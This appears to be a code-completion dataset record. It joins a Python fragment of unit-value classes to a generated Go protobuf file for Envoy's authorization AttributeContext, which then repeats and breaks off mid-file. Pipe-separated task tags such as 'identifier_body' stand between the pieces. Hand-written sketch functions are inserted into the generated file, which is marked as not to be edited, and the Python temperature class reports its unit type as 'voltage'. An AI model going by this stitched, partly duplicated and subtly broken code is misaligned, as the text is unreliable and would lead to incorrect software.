def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance"
| """Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses.""" | identifier_body |
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) GetMetadataContext() *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6] | type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identity of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or `Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
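// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// A hand-built HttpRequest such as a test for an ext_authz server might use.
// Header keys are lower-cased and Path keeps its query string, as the field
// comments above require; Size is -1 because the body length is unknown.
// The function name and all values are hypothetical.
func exampleHttpRequestSketch() *AttributeContext_HttpRequest {
	return &AttributeContext_HttpRequest{
		Id:     "7f0f2db6-example", // typically the X-Request-ID value
		Method: "GET",
		Headers: map[string]string{
			"content-type": "application/json", // keys must be lower-cased
			"x-request-id": "7f0f2db6-example",
		},
		Path:     "/users?limit=10", // query string stays inside Path; Query is left empty
		Host:     "api.example.internal",
		Scheme:   "https",
		Size:     -1, // request size unknown
		Protocol: "HTTP/1.1",
	}
}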
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil {
return m.Query
}
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
} | random_line_split |
|
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi-hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi-hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
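// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// Assembling an AttributeContext roughly the way an ext_authz client would
// before sending a check request. Peer addresses are left nil here to avoid
// constructing core.Address values; every name and value is hypothetical.
func exampleAttributeContextSketch(req *AttributeContext_Request) *AttributeContext {
	return &AttributeContext{
		Source:      &AttributeContext_Peer{Service: "frontend"},
		Destination: &AttributeContext_Peer{Service: "orders"},
		Request:     req,
		// Opaque hints for the authorization server; these are never
		// forwarded to the upstream service.
		ContextExtensions: map[string]string{"virtual_host": "orders-vhost"},
	}
}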
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) GetMetadataContext() *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
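// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// The generated Get* accessors tolerate nil receivers, so a chained read
// needs no intermediate nil checks: any missing link yields a typed zero
// value, and indexing the resulting nil map is still safe.
func exampleHeaderLookupSketch(ctx *AttributeContext) string {
	return ctx.GetRequest().GetHttp().GetHeaders()["authorization"]
}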
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer; this is typically the IP address.
// It can also be a UDS path, or another kind of address.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identity of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
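// --- Illustrative sketch (not part of the protoc-gen-go output) ---
// A service peer filled in as the field comments above describe: the
// downstream service cluster name, Kubernetes-style labels, and a SPIFFE
// principal. All values are invented and the Address is left nil.
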